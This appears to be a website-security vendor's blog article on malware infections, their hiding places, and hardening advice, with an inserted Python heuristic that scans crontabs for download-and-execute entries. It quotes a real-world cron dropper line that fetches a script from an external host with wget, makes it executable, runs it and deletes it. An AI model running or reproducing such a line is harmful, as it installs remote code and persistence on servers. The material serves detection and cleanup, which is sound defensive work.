Almost since the inception of the internet, malware infections have kept pace to become the biggest nuisance experienced by a site owner. With an ever increasing number of sites making up the World Wide Web, malware infections are becoming more and more common. In this article, we will discuss what malware is, the different types we have come across, the methods used to inject malware into a site, and how you can harden / protect your site against these methods.
What is malware?
So what exactly is malware? Malware is short for “malicious software” and is a file or piece of code transmitted over a network. Malware can perform virtually any behavior an attacker wants, depending on the vulnerability exploited by the attack. Usually its intention is to abuse the site’s resources without damaging the site: if a site is broken / disabled, the attacker will not necessarily be able to achieve their goals. It is capable of inflicting damage such as redirecting users to spam sites, using website resources to host phishing, filling the website with unwanted and disreputable links, stealing customers’ credit card numbers, or defacing the site. All of this can have an extremely negative effect on your website’s reputation and SEO. There are different types of malware, such as the following:
- Credit card skimmer
- Drive by download
- Back door
How malware spreads
The age-old question that website owners usually ask is “how did this infection come about?” To answer it, you must first identify the attack. Malware can be found in some of the most obscure places, but here are the most common culprits we found:
- Content management system (CMS) core integrity files
- Site root directory
- Theme files
- Plugin / Extension Files
- Index file
Malware injection primarily occurs through software vulnerabilities, third-party integrations, and login credentials obtained through various tactics. How far an infection can reach into your website, and the level of access it gains to your environment, depends on the type of vulnerability it exploits and on what other mitigation / protection mechanisms are in place, so this varies from infection to infection. It is important to note that re-infections can occur if no post-hack adjustments are made to the site. Malware can still potentially be injected without administrator rights (e.g., via backdoors), and it can be installed without the victim’s knowledge in the event of a compromise. To reduce the chances of malware re-infecting your site, skip to our section on post-hack prevention.
What malware looks like
As mentioned earlier, malware can appear in several forms. Our server-side scanner is regularly updated with new signatures discovered when attackers write new malware to exploit new vulnerabilities, sometimes zero-day (also known as 0-day) exploits. For example, here is a recent malware infection in a jQuery file we encountered:
Another type of malware that we found in the wp content folder for WordPress was a backdoor script that appeared as such:
As you can see, the code in these files is generally encoded in multiple layers of obfuscation and is frequently accompanied by tampered .htaccess files that alter how PHP files are handled in the website environment:
Order Allow,Deny
Allow from all
We can even detect malware in cron jobs on a hosting server. For example:
MAILTO=""
* * * * * wget -q -O xxxd hxxp://hello.hahaha666[.]xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/websitefolder/public_html 811-5 && rm -f xxxd
These are just a few of the many types of malware that we recently encountered during cleanups, but they are worth noting in case you are looking to identify malware on your own server.
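The cron entry above has a recognisable shape: run every minute, fetch a file with wget, mark it executable, run it with sh, then delete it, with MAILTO="" so no output is mailed to anyone. The following is an added example, not code from the original article: a small heuristic scanner that flags crontab lines matching two or more of those indicators. The rules, scores and sample crontab are constructed for illustration, and the URL in the sample is deliberately defanged.

```python
"""Added example: heuristic scan of crontab text for download-then-execute
entries like the one quoted in the article. A line is reported when it
matches at least two rules; MAILTO="" is reported separately."""
import re

# Each rule: (name, compiled regex), matched against one crontab line.
RULES = [
    ("download_tool", re.compile(r"\b(wget|curl)\b")),
    ("make_executable", re.compile(r"\bchmod\s+(?:[0-7]{3,4}|[ugoa]*\+x)\b")),
    ("shell_exec", re.compile(r"\b(ba)?sh\s+\S+")),
    ("self_delete", re.compile(r"\brm\s+-f\b")),
    ("every_minute", re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s")),
    ("url_in_command", re.compile(r"\bh(xx|tt)ps?://", re.I)),
]
MAIL_SUPPRESSED = re.compile(r'^MAILTO\s*=\s*""\s*$')


def scan_crontab(text):
    """Return (findings, mail_off): findings is a list of (line_no, rule names)
    for lines matching two or more rules; mail_off is True if MAILTO="" was set."""
    findings = []
    mail_off = False
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if MAIL_SUPPRESSED.match(stripped):
            mail_off = True
            continue
        hits = [name for name, rx in RULES if rx.search(stripped)]
        if len(hits) >= 2:
            findings.append((no, hits))
    return findings, mail_off


# Constructed sample crontab: a benign nightly backup plus a dropper-style
# entry shaped like the article's example (hostname replaced, URL defanged).
SAMPLE = '''MAILTO=""
0 3 * * * /usr/bin/mysqldump site > /backups/site.sql
* * * * * wget -q -O xxxd hxxp://example.invalid/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/websitefolder/public_html && rm -f xxxd
'''

if __name__ == "__main__":
    found, mail_off = scan_crontab(SAMPLE)
    print("MAILTO suppressed:", mail_off)
    for line_no, hits in found:
        print(f"line {line_no}: {', '.join(hits)}")
```

On a real server, feed it the output of crontab -l for each account and the contents of /etc/cron.d; a hit is a prompt to inspect the line, not proof by itself.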
While identifying and removing unwanted malware is important, one of the most crucial steps in repairing a site is tracing the root cause. Many site owners assume that if they simply restore a backup taken before the infection, everything will be fine again. However, this does not resolve the underlying vulnerabilities that allowed the hack to occur in the first place. The same philosophy applies to a pest infestation or to personal health: you may have gotten rid of the bugs or the disease, but understanding the main reason why these things happened in the first place helps prevent them from happening again and may cost less in the future.
One of the most important recommendations I give to clients is to update their version of CMS (WordPress, Drupal, Joomla, Magento, etc.), as well as the theme and plugins.
Another recommendation is to make sure you keep plugins and user privileges to a minimum. Having too many plugins on a CMS can potentially make the site more vulnerable to infection, and having too many users with administrator privileges can be riskier.
Because database breaches have become more common, you also want to make sure that all accounts have a strong password. Using a password generator together with a password manager is one of the most effective ways to make sure your site isn’t brute-forced. For more information on the security of your site, we recommend that you read our guide.
Malware infections for the average business can be scary and frustrating to experience, which is why our goal as a business is to educate and inform site owners on what to expect and how to overcome infections. As attacks continue to grow and get smarter, we must continue to be proactive and adapt to them. Since the average online user may not fully understand what is going on in the back end, it is important for website owners to protect their customers’ sensitive information.
As the New Year begins, make it a personal goal to maintain control over your security not only as an individual online, but as an online business as well. In addition to the previous recommendations and tips for securing your site, we offer a WordPress plugin that actively monitors your site, as well as our Website security plan including firewall protection. Get the peace of mind you need for your website security in the New Year.